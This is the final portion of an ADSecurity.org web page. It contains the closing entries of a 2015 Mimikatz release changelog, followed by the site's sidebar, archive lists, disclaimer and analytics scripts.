domain controller with Directory Service<br /> (DIRECTORY_SERVICE)</p> <p><strong>Mimikatz Release Date: 8/30/2015</strong><br /> Cleaning &amp; few Win10 adaptations</p> <p><strong>Mimikatz Release Date: 8/25/2015</strong><br /> Licence fix on one missed file by AnkhSVN 😉<br /> Global licence update, credits to Vincent LE TOUX for DCSync, and lsadump::hash moved to crypto::hash</p> <p>&nbsp;</p> <p>&nbsp;</p> <p><strong><em>This page and all content Copyright </em>© 2015-2016 <em>Sean Metcalf (ADSecurity.org).</em> All Rights Reserved. No warranty is implied or provided.<br /> </strong></p> <p>&nbsp;</p> <div class="tptn_counter" id="tptn_counter_1821">(Visited 697,032 times, 10 visits today)</div> </div> </div> </div> </div><!-- #content-main --> <div id="sidebar1" class="sidebar sidebar-right widget-area col-md-4"> <div id="recent-posts-4" class="sidebar-wrap widget_recent_entries"> <h3>Recent Posts</h3> <ul> <li> <a href="https://adsecurity.org/?p=4436">BSides Dublin &#8211; The Current State of Microsoft Identity Security: Common Security Issues and Misconfigurations &#8211; Sean Metcalf</a> </li> <li> <a href="https://adsecurity.org/?p=4434">DEFCON 2017: Transcript &#8211; Hacking the Cloud</a> </li> <li> <a href="https://adsecurity.org/?p=4432">Detecting the Elusive: Active Directory Threat Hunting</a> </li> <li> <a href="https://adsecurity.org/?p=4430">Detecting Kerberoasting Activity</a> </li> <li> <a href="https://adsecurity.org/?p=4428">Detecting Password Spraying with Security Event Auditing</a> </li> </ul> </div><div id="text-3" class="sidebar-wrap widget_text"><h3>Trimarc Active Directory Security Services</h3> <div class="textwidget">Have concerns about your Active Directory environment? Trimarc helps enterprises improve their security posture. <p> <a href="http://trimarcsecurity.com/security-services">Find out how...</a> TrimarcSecurity.com</div> </div><div id="widget_tptn_pop-4" class="sidebar-wrap tptn_posts_list_widget"><h3>Popular Posts</h3><div class="tptn_posts tptn_posts_widget tptn_posts_widget4"><ul><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=478" class="tptn_link"><span class="tptn_title">PowerShell Encoding &#038; Decoding (Base64)</span></a></span></li><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=2362" class="tptn_link"><span class="tptn_title">Attack Methods for Gaining Domain Admin Rights in&hellip;</span></a></span></li><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=483" class="tptn_link"><span class="tptn_title">Kerberos &#038; KRBTGT: Active Directory&#8217;s&hellip;</span></a></span></li><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=2288" class="tptn_link"><span class="tptn_title">Finding Passwords in SYSVOL &#038; Exploiting Group&hellip;</span></a></span></li><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=3377" class="tptn_link"><span class="tptn_title">Securing Domain Controllers to Improve Active&hellip;</span></a></span></li><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=3299" class="tptn_link"><span class="tptn_title">Securing Windows Workstations: Developing a Secure Baseline</span></a></span></li><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=3458" class="tptn_link"><span class="tptn_title">Detecting Kerberoasting Activity</span></a></span></li><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=1729" class="tptn_link"><span class="tptn_title">Mimikatz DCSync Usage, Exploitation, and Detection</span></a></span></li><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=3658" class="tptn_link"><span class="tptn_title">Scanning for Active Directory Privileges &#038;&hellip;</span></a></span></li><li><span class="tptn_after_thumb"><a href="https://adsecurity.org/?p=3164" class="tptn_link"><span class="tptn_title">Microsoft LAPS Security &#038; Active Directory LAPS&hellip;</span></a></span></li></ul><div class="tptn_clear"></div></div></div><div id="categories-4" class="sidebar-wrap widget_categories"><h3>Categories</h3> <ul> <li class="cat-item cat-item-565"><a href="https://adsecurity.org/?cat=565">ActiveDirectorySecurity</a> </li> <li class="cat-item cat-item-55"><a href="https://adsecurity.org/?cat=55">Apple Security</a> </li> <li class="cat-item cat-item-431"><a href="https://adsecurity.org/?cat=431">Cloud Security</a> </li> <li class="cat-item cat-item-17"><a href="https://adsecurity.org/?cat=17">Continuing Education</a> </li> <li class="cat-item cat-item-396"><a href="https://adsecurity.org/?cat=396">Entertainment</a> </li> <li class="cat-item cat-item-347"><a href="https://adsecurity.org/?cat=347">Exploit</a> </li> <li class="cat-item cat-item-1039"><a href="https://adsecurity.org/?cat=1039">Hacking</a> </li> <li class="cat-item cat-item-168"><a href="https://adsecurity.org/?cat=168">Hardware Security</a> </li> <li class="cat-item cat-item-172"><a href="https://adsecurity.org/?cat=172">Hypervisor Security</a> </li> <li class="cat-item cat-item-126"><a href="https://adsecurity.org/?cat=126">Linux/Unix Security</a> </li> <li class="cat-item cat-item-343"><a href="https://adsecurity.org/?cat=343">Malware</a> </li> <li class="cat-item cat-item-11"><a href="https://adsecurity.org/?cat=11">Microsoft Security</a> </li> <li class="cat-item cat-item-819"><a href="https://adsecurity.org/?cat=819">Mitigation</a> </li> <li class="cat-item cat-item-48"><a href="https://adsecurity.org/?cat=48">Network/System Security</a> </li> <li class="cat-item cat-item-7"><a href="https://adsecurity.org/?cat=7">PowerShell</a> </li> <li class="cat-item cat-item-698"><a href="https://adsecurity.org/?cat=698">RealWorld</a> </li> <li class="cat-item cat-item-21"><a href="https://adsecurity.org/?cat=21">Security</a> </li> <li class="cat-item cat-item-234"><a href="https://adsecurity.org/?cat=234">Security Conference Presentation/Video</a> </li> <li class="cat-item cat-item-1045"><a href="https://adsecurity.org/?cat=1045">Security Recommendation</a> </li> <li class="cat-item cat-item-24"><a href="https://adsecurity.org/?cat=24">Technical Article</a> </li> <li class="cat-item cat-item-4"><a href="https://adsecurity.org/?cat=4">Technical Reading</a> </li> <li class="cat-item cat-item-2"><a href="https://adsecurity.org/?cat=2">Technical Reference</a> </li> <li class="cat-item cat-item-156"><a href="https://adsecurity.org/?cat=156">TheCloud</a> </li> <li class="cat-item cat-item-930"><a href="https://adsecurity.org/?cat=930">Vulnerability</a> </li> </ul> </div><div id="tag_cloud-3" class="sidebar-wrap widget_tag_cloud"><h3>Tags</h3><div class="tagcloud"><a href="https://adsecurity.org/?tag=activedirectory" class="tag-cloud-link tag-link-20 tag-link-position-1" style="font-size: 22pt;" aria-label="ActiveDirectory (55 items)">ActiveDirectory</a> <a href="https://adsecurity.org/?tag=active-directory" class="tag-cloud-link tag-link-75 tag-link-position-2" style="font-size: 10.453608247423pt;" aria-label="Active Directory (8 items)">Active Directory</a> <a href="https://adsecurity.org/?tag=active-directory-security" class="tag-cloud-link tag-link-976 tag-link-position-3" style="font-size: 9.7319587628866pt;" aria-label="Active Directory Security (7 items)">Active Directory Security</a> <a href="https://adsecurity.org/?tag=activedirectorysecurity" class="tag-cloud-link tag-link-113 tag-link-position-4" style="font-size: 13.773195876289pt;" aria-label="ActiveDirectorySecurity (14 items)">ActiveDirectorySecurity</a> <a href="https://adsecurity.org/?tag=adreading" class="tag-cloud-link tag-link-5 tag-link-position-5" style="font-size: 13.340206185567pt;" aria-label="ADReading (13 items)">ADReading</a> <a href="https://adsecurity.org/?tag=ad-security" class="tag-cloud-link tag-link-100 tag-link-position-6" style="font-size: 8pt;" aria-label="AD Security (5 items)">AD Security</a> <a href="https://adsecurity.org/?tag=adsecurity" class="tag-cloud-link tag-link-86 tag-link-position-7" style="font-size: 10.453608247423pt;" aria-label="ADSecurity (8 items)">ADSecurity</a> <a href="https://adsecurity.org/?tag=azure" class="tag-cloud-link tag-link-25 tag-link-position-8" style="font-size: 8pt;" aria-label="Azure (5 items)">Azure</a> <a href="https://adsecurity.org/?tag=azuread" class="tag-cloud-link tag-link-136 tag-link-position-9" style="font-size: 8pt;" aria-label="AzureAD (5 items)">AzureAD</a> <a href="https://adsecurity.org/?tag=dcsync" class="tag-cloud-link tag-link-598 tag-link-position-10" style="font-size: 10.453608247423pt;" aria-label="DCSync (8 items)">DCSync</a> <a href="https://adsecurity.org/?tag=domaincontroller" class="tag-cloud-link tag-link-101 tag-link-position-11" style="font-size: 15.216494845361pt;" aria-label="DomainController (18 items)">DomainController</a> <a href="https://adsecurity.org/?tag=goldenticket" class="tag-cloud-link tag-link-303 tag-link-position-12" style="font-size: 11.175257731959pt;" aria-label="GoldenTicket (9 items)">GoldenTicket</a> <a href="https://adsecurity.org/?tag=grouppolicy" class="tag-cloud-link tag-link-196 tag-link-position-13" style="font-size: 8pt;" aria-label="GroupPolicy (5 items)">GroupPolicy</a> <a href="https://adsecurity.org/?tag=hyperv" class="tag-cloud-link tag-link-3 tag-link-position-14" style="font-size: 8pt;" aria-label="HyperV (5 items)">HyperV</a> <a href="https://adsecurity.org/?tag=invoke-mimikatz" class="tag-cloud-link tag-link-336 tag-link-position-15" style="font-size: 10.453608247423pt;" aria-label="Invoke-Mimikatz (8 items)">Invoke-Mimikatz</a> <a href="https://adsecurity.org/?tag=kb3011780" class="tag-cloud-link tag-link-337 tag-link-position-16" style="font-size: 9.7319587628866pt;" aria-label="KB3011780 (7 items)">KB3011780</a> <a href="https://adsecurity.org/?tag=kdc" class="tag-cloud-link tag-link-80 tag-link-position-17" style="font-size: 8pt;" aria-label="KDC (5 items)">KDC</a> <a href="https://adsecurity.org/?tag=kerberos" class="tag-cloud-link tag-link-81 tag-link-position-18" style="font-size: 15.216494845361pt;" aria-label="Kerberos (18 items)">Kerberos</a> <a href="https://adsecurity.org/?tag=kerberoshacking" class="tag-cloud-link tag-link-298 tag-link-position-19" style="font-size: 11.752577319588pt;" aria-label="KerberosHacking (10 items)">KerberosHacking</a> <a href="https://adsecurity.org/?tag=krbtgt" class="tag-cloud-link tag-link-394 tag-link-position-20" style="font-size: 9.7319587628866pt;" aria-label="KRBTGT (7 items)">KRBTGT</a> <a href="https://adsecurity.org/?tag=laps" class="tag-cloud-link tag-link-631 tag-link-position-21" style="font-size: 9.0103092783505pt;" aria-label="LAPS (6 items)">LAPS</a> <a href="https://adsecurity.org/?tag=lsass" class="tag-cloud-link tag-link-71 tag-link-position-22" style="font-size: 11.175257731959pt;" aria-label="LSASS (9 items)">LSASS</a> <a href="https://adsecurity.org/?tag=mcm" class="tag-cloud-link tag-link-6 tag-link-position-23" style="font-size: 14.061855670103pt;" aria-label="MCM (15 items)">MCM</a> <a href="https://adsecurity.org/?tag=microsoftemet" class="tag-cloud-link tag-link-58 tag-link-position-24" style="font-size: 11.175257731959pt;" aria-label="MicrosoftEMET (9 items)">MicrosoftEMET</a> <a href="https://adsecurity.org/?tag=microsoftwindows" class="tag-cloud-link tag-link-102 tag-link-position-25" style="font-size: 9.7319587628866pt;" aria-label="MicrosoftWindows (7 items)">MicrosoftWindows</a> <a href="https://adsecurity.org/?tag=mimikatz" class="tag-cloud-link tag-link-207 tag-link-position-26" style="font-size: 18.103092783505pt;" aria-label="mimikatz (29 items)">mimikatz</a> <a href="https://adsecurity.org/?tag=ms14068" class="tag-cloud-link tag-link-295 tag-link-position-27" style="font-size: 11.175257731959pt;" aria-label="MS14068 (9 items)">MS14068</a> <a href="https://adsecurity.org/?tag=passthehash" class="tag-cloud-link tag-link-44 tag-link-position-28" style="font-size: 9.7319587628866pt;" aria-label="PassTheHash (7 items)">PassTheHash</a> <a href="https://adsecurity.org/?tag=powershell" class="tag-cloud-link tag-link-575 tag-link-position-29" style="font-size: 18.536082474227pt;" aria-label="PowerShell (31 items)">PowerShell</a> <a href="https://adsecurity.org/?tag=powershellcode" class="tag-cloud-link tag-link-22 tag-link-position-30" style="font-size: 14.927835051546pt;" aria-label="PowerShellCode (17 items)">PowerShellCode</a> <a href="https://adsecurity.org/?tag=powershellhacking" class="tag-cloud-link tag-link-68 tag-link-position-31" style="font-size: 8pt;" aria-label="PowerShellHacking (5 items)">PowerShellHacking</a> <a href="https://adsecurity.org/?tag=powershellv5" class="tag-cloud-link tag-link-69 tag-link-position-32" style="font-size: 8pt;" aria-label="PowerShellv5 (5 items)">PowerShellv5</a> <a href="https://adsecurity.org/?tag=powersploit" class="tag-cloud-link tag-link-232 tag-link-position-33" style="font-size: 10.453608247423pt;" aria-label="PowerSploit (8 items)">PowerSploit</a> <a href="https://adsecurity.org/?tag=presentation" class="tag-cloud-link tag-link-422 tag-link-position-34" style="font-size: 9.7319587628866pt;" aria-label="Presentation (7 items)">Presentation</a> <a href="https://adsecurity.org/?tag=security" class="tag-cloud-link tag-link-576 tag-link-position-35" style="font-size: 8pt;" aria-label="Security (5 items)">Security</a> <a href="https://adsecurity.org/?tag=silverticket" class="tag-cloud-link tag-link-304 tag-link-position-36" style="font-size: 11.175257731959pt;" aria-label="SilverTicket (9 items)">SilverTicket</a> <a href="https://adsecurity.org/?tag=sneakyadpersistence" class="tag-cloud-link tag-link-596 tag-link-position-37" style="font-size: 9.0103092783505pt;" aria-label="SneakyADPersistence (6 items)">SneakyADPersistence</a> <a href="https://adsecurity.org/?tag=spn" class="tag-cloud-link tag-link-294 tag-link-position-38" style="font-size: 9.0103092783505pt;" aria-label="SPN (6 items)">SPN</a> <a href="https://adsecurity.org/?tag=tgs" class="tag-cloud-link tag-link-528 tag-link-position-39" style="font-size: 9.0103092783505pt;" aria-label="TGS (6 items)">TGS</a> <a href="https://adsecurity.org/?tag=tgt" class="tag-cloud-link tag-link-529 tag-link-position-40" style="font-size: 9.0103092783505pt;" aria-label="TGT (6 items)">TGT</a> <a href="https://adsecurity.org/?tag=windows7" class="tag-cloud-link tag-link-117 tag-link-position-41" style="font-size: 8pt;" aria-label="Windows7 (5 items)">Windows7</a> <a href="https://adsecurity.org/?tag=windows10" class="tag-cloud-link tag-link-494 tag-link-position-42" style="font-size: 10.453608247423pt;" aria-label="Windows10 (8 items)">Windows10</a> <a href="https://adsecurity.org/?tag=windowsserver2008r2" class="tag-cloud-link tag-link-46 tag-link-position-43" style="font-size: 9.0103092783505pt;" aria-label="WindowsServer2008R2 (6 items)">WindowsServer2008R2</a> <a href="https://adsecurity.org/?tag=windowsserver2012" class="tag-cloud-link tag-link-47 tag-link-position-44" style="font-size: 11.175257731959pt;" aria-label="WindowsServer2012 (9 items)">WindowsServer2012</a> <a href="https://adsecurity.org/?tag=windowsserver2012r2" class="tag-cloud-link tag-link-54 tag-link-position-45" style="font-size: 9.7319587628866pt;" aria-label="WindowsServer2012R2 (7 items)">WindowsServer2012R2</a></div> </div><div id="search-2" class="sidebar-wrap widget_search"><form class="searchform" method="get" action="https://adsecurity.org"> <div class="input-group"> <div class="form-group live-search-input"> <label for="s" class="screen-reader-text">Search for:</label> <input type="text" id="s" name="s" class="form-control" placeholder="Search"> </div> <span class="input-group-btn"> <button class="btn btn-default" type="submit"><i class="fa fa-search"></i></button> </span> </div> </form></div> <div id="recent-posts-2" class="sidebar-wrap widget_recent_entries"> <h3>Recent Posts</h3> <ul> <li> <a href="https://adsecurity.org/?p=4436">BSides Dublin &#8211; The Current State of Microsoft Identity Security: Common Security Issues and Misconfigurations &#8211; Sean Metcalf</a> </li> <li> <a href="https://adsecurity.org/?p=4434">DEFCON 2017: Transcript &#8211; Hacking the Cloud</a> </li> <li> <a href="https://adsecurity.org/?p=4432">Detecting the Elusive: Active Directory Threat Hunting</a> </li> <li> <a href="https://adsecurity.org/?p=4430">Detecting Kerberoasting Activity</a> </li> <li> <a href="https://adsecurity.org/?p=4428">Detecting Password Spraying with Security Event Auditing</a> </li> </ul> </div><div id="recent-comments-2" class="sidebar-wrap widget_recent_comments"><h3>Recent Comments</h3><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Derek</span> on <a href="https://adsecurity.org/?p=3592#comment-13603">Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory</a></li><li class="recentcomments"><span class="comment-author-link"><a href="https://ADSecurity.org" class="url" rel="ugc">Sean Metcalf</a></span> on <a href="https://adsecurity.org/?p=3782#comment-13545">Securing Microsoft Active Directory Federation Server (ADFS)</a></li><li class="recentcomments"><span class="comment-author-link">Brad</span> on <a href="https://adsecurity.org/?p=3782#comment-13544">Securing Microsoft Active Directory Federation Server (ADFS)</a></li><li class="recentcomments"><span class="comment-author-link">Joonas</span> on <a href="https://adsecurity.org/?p=3719#comment-13229">Gathering AD Data with the Active Directory PowerShell Module</a></li><li class="recentcomments"><span class="comment-author-link"><a href="https://ADSecurity.org" class="url" rel="ugc">Sean Metcalf</a></span> on <a href="https://adsecurity.org/?p=3719#comment-13215">Gathering AD Data with the Active Directory PowerShell Module</a></li></ul></div><div id="archives-2" class="sidebar-wrap widget_archive"><h3>Archives</h3> <ul> <li><a href='https://adsecurity.org/?m=202406'>June 2024</a></li> <li><a href='https://adsecurity.org/?m=202405'>May 2024</a></li> <li><a href='https://adsecurity.org/?m=202005'>May 2020</a></li> <li><a href='https://adsecurity.org/?m=202001'>January 2020</a></li> <li><a href='https://adsecurity.org/?m=201908'>August 2019</a></li> <li><a href='https://adsecurity.org/?m=201903'>March 2019</a></li> <li><a href='https://adsecurity.org/?m=201902'>February 2019</a></li> <li><a href='https://adsecurity.org/?m=201810'>October 2018</a></li> <li><a href='https://adsecurity.org/?m=201808'>August 2018</a></li> <li><a href='https://adsecurity.org/?m=201805'>May 2018</a></li> <li><a href='https://adsecurity.org/?m=201801'>January 2018</a></li> <li><a href='https://adsecurity.org/?m=201711'>November 2017</a></li> <li><a href='https://adsecurity.org/?m=201708'>August 2017</a></li> <li><a href='https://adsecurity.org/?m=201706'>June 2017</a></li> <li><a href='https://adsecurity.org/?m=201705'>May 2017</a></li> <li><a href='https://adsecurity.org/?m=201702'>February 2017</a></li> <li><a href='https://adsecurity.org/?m=201701'>January 2017</a></li> <li><a href='https://adsecurity.org/?m=201611'>November 2016</a></li> <li><a href='https://adsecurity.org/?m=201610'>October 2016</a></li> <li><a href='https://adsecurity.org/?m=201609'>September 2016</a></li> <li><a href='https://adsecurity.org/?m=201608'>August 2016</a></li> <li><a href='https://adsecurity.org/?m=201607'>July 2016</a></li> <li><a href='https://adsecurity.org/?m=201606'>June 2016</a></li> <li><a href='https://adsecurity.org/?m=201604'>April 2016</a></li> <li><a href='https://adsecurity.org/?m=201603'>March 2016</a></li> <li><a href='https://adsecurity.org/?m=201602'>February 2016</a></li> <li><a href='https://adsecurity.org/?m=201601'>January 2016</a></li> <li><a href='https://adsecurity.org/?m=201512'>December 2015</a></li> <li><a href='https://adsecurity.org/?m=201511'>November 2015</a></li> <li><a href='https://adsecurity.org/?m=201510'>October 2015</a></li> <li><a href='https://adsecurity.org/?m=201509'>September 2015</a></li> <li><a href='https://adsecurity.org/?m=201508'>August 2015</a></li> <li><a href='https://adsecurity.org/?m=201507'>July 2015</a></li> <li><a href='https://adsecurity.org/?m=201506'>June 2015</a></li> <li><a href='https://adsecurity.org/?m=201505'>May 2015</a></li> <li><a href='https://adsecurity.org/?m=201504'>April 2015</a></li> <li><a href='https://adsecurity.org/?m=201503'>March 2015</a></li> <li><a href='https://adsecurity.org/?m=201502'>February 2015</a></li> <li><a href='https://adsecurity.org/?m=201501'>January 2015</a></li> <li><a href='https://adsecurity.org/?m=201412'>December 2014</a></li> <li><a href='https://adsecurity.org/?m=201411'>November 2014</a></li> <li><a href='https://adsecurity.org/?m=201410'>October 2014</a></li> <li><a href='https://adsecurity.org/?m=201409'>September 2014</a></li> <li><a href='https://adsecurity.org/?m=201408'>August 2014</a></li> <li><a href='https://adsecurity.org/?m=201407'>July 2014</a></li> <li><a href='https://adsecurity.org/?m=201406'>June 2014</a></li> <li><a href='https://adsecurity.org/?m=201405'>May 2014</a></li> <li><a href='https://adsecurity.org/?m=201404'>April 2014</a></li> <li><a href='https://adsecurity.org/?m=201403'>March 2014</a></li> <li><a href='https://adsecurity.org/?m=201402'>February 2014</a></li> <li><a href='https://adsecurity.org/?m=201307'>July 2013</a></li> <li><a href='https://adsecurity.org/?m=201211'>November 2012</a></li> <li><a href='https://adsecurity.org/?m=201203'>March 2012</a></li> <li><a href='https://adsecurity.org/?m=201202'>February 2012</a></li> </ul> </div><div id="categories-2" class="sidebar-wrap widget_categories"><h3>Categories</h3> <ul> <li class="cat-item cat-item-565"><a href="https://adsecurity.org/?cat=565">ActiveDirectorySecurity</a> </li> <li class="cat-item cat-item-55"><a href="https://adsecurity.org/?cat=55">Apple Security</a> </li> <li class="cat-item cat-item-431"><a href="https://adsecurity.org/?cat=431">Cloud Security</a> </li> <li class="cat-item cat-item-17"><a href="https://adsecurity.org/?cat=17">Continuing Education</a> </li> <li class="cat-item cat-item-396"><a href="https://adsecurity.org/?cat=396">Entertainment</a> </li> <li class="cat-item cat-item-347"><a href="https://adsecurity.org/?cat=347">Exploit</a> </li> <li class="cat-item cat-item-1039"><a href="https://adsecurity.org/?cat=1039">Hacking</a> </li> <li class="cat-item cat-item-168"><a href="https://adsecurity.org/?cat=168">Hardware Security</a> </li> <li class="cat-item cat-item-172"><a href="https://adsecurity.org/?cat=172">Hypervisor Security</a> </li> <li class="cat-item cat-item-126"><a href="https://adsecurity.org/?cat=126">Linux/Unix Security</a> </li> <li class="cat-item cat-item-343"><a href="https://adsecurity.org/?cat=343">Malware</a> </li> <li class="cat-item cat-item-11"><a href="https://adsecurity.org/?cat=11">Microsoft Security</a> </li> <li class="cat-item cat-item-819"><a href="https://adsecurity.org/?cat=819">Mitigation</a> </li> <li class="cat-item cat-item-48"><a href="https://adsecurity.org/?cat=48">Network/System Security</a> </li> <li class="cat-item cat-item-7"><a href="https://adsecurity.org/?cat=7">PowerShell</a> </li> <li class="cat-item cat-item-698"><a href="https://adsecurity.org/?cat=698">RealWorld</a> </li> <li class="cat-item cat-item-21"><a href="https://adsecurity.org/?cat=21">Security</a> </li> <li class="cat-item cat-item-234"><a href="https://adsecurity.org/?cat=234">Security Conference Presentation/Video</a> </li> <li class="cat-item cat-item-1045"><a href="https://adsecurity.org/?cat=1045">Security Recommendation</a> </li> <li class="cat-item cat-item-24"><a href="https://adsecurity.org/?cat=24">Technical Article</a> </li> <li class="cat-item cat-item-4"><a href="https://adsecurity.org/?cat=4">Technical Reading</a> </li> <li class="cat-item cat-item-2"><a href="https://adsecurity.org/?cat=2">Technical Reference</a> </li> <li class="cat-item cat-item-156"><a href="https://adsecurity.org/?cat=156">TheCloud</a> </li> <li class="cat-item cat-item-930"><a href="https://adsecurity.org/?cat=930">Vulnerability</a> </li> </ul> </div><div id="meta-2" class="sidebar-wrap widget_meta"><h3>Meta</h3> <ul> <li><a href="https://adsecurity.org/wp-login.php">Log in</a></li> <li><a href="https://adsecurity.org/?feed=rss2">Entries feed</a></li> <li><a href="https://adsecurity.org/?feed=comments-rss2">Comments feed</a></li> <li><a href="https://wordpress.org/">WordPress.org</a></li> </ul> </div> </div><!-- #sidebar1 --> </div><!-- #content --> <div id="sidebar_bottom" class="sidebar widget-area row footer-widget-col-3"> <div id="text-2" class="sidebar-wrap widget_text col-sm-4"><h3>Copyright</h3> <div class="textwidget">Content Disclaimer: This blog and its contents are provided "AS IS" with no warranties, and they confer no rights. Script samples are provided for informational purposes only and no guarantee is provided as to functionality or suitability. The views shared on this blog reflect those of the authors and do not represent the views of any companies mentioned. Content Ownership: All content posted here is intellectual work and under the current law, the poster owns the copyright of the article. Terms of Use Copyright © 2011 - 2020.</div> </div> </div> <div id="footer" class="row default-footer"> <div class="copyright-developer"> <div id="copyright"> <p>Content Disclaimer: This blog and its contents are provided "AS IS" with no warranties, and they confer no rights. Script samples are provided for informational purposes only and no guarantee is provided as to functionality or suitability. The views shared on this blog reflect those of the authors and do not represent the views of any companies mentioned. </p> </div> <div id="developer"> <p> Made with <i class="fa fa-heart"></i> by <a href="https://www.graphene-theme.com/" rel="nofollow">Graphene Themes</a>. </p> </div> </div> </div><!-- #footer --> </div><!-- #container --> <!-- Start of StatCounter Code --> <script> <!-- var sc_project=10100711; var sc_security="4b306538"; var sc_invisible=1; var scJsHost = (("https:" == document.location.protocol) ? "https://secure." : "http://www."); //--> </script> <script type="text/javascript" src="https://secure.statcounter.com/counter/counter.js" async></script> <noscript><div class="statcounter"><a title="web analytics" href="https://statcounter.com/"><img class="statcounter" src="https://c.statcounter.com/10100711/0/4b306538/1/" alt="web analytics" /></a></div></noscript> <!-- End of StatCounter Code --> <a href="#" id="back-to-top" title="Back to top"><i class="fa fa-chevron-up"></i></a> <script type="text/javascript" id="tptn_tracker-js-extra"> /* <![CDATA[ */ var ajax_tptn_tracker = {"ajax_url":"https:\/\/adsecurity.org\/wp-admin\/admin-ajax.php","top_ten_id":"1821","top_ten_blog_id":"1","activate_counter":"11","top_ten_debug":"0","tptn_rnd":"1585371937"}; /* ]]> */ </script> <script type="text/javascript" src="https://adsecurity.org/wp-content/plugins/top-10/includes/js/top-10-tracker.min.js?ver=1.0" id="tptn_tracker-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-includes/js/comment-reply.min.js?ver=6.5.5" id="comment-reply-js" async="async" data-wp-strategy="async"></script> </body> </html>

Pages: 1 2 3 4 5 6 7 8 9 10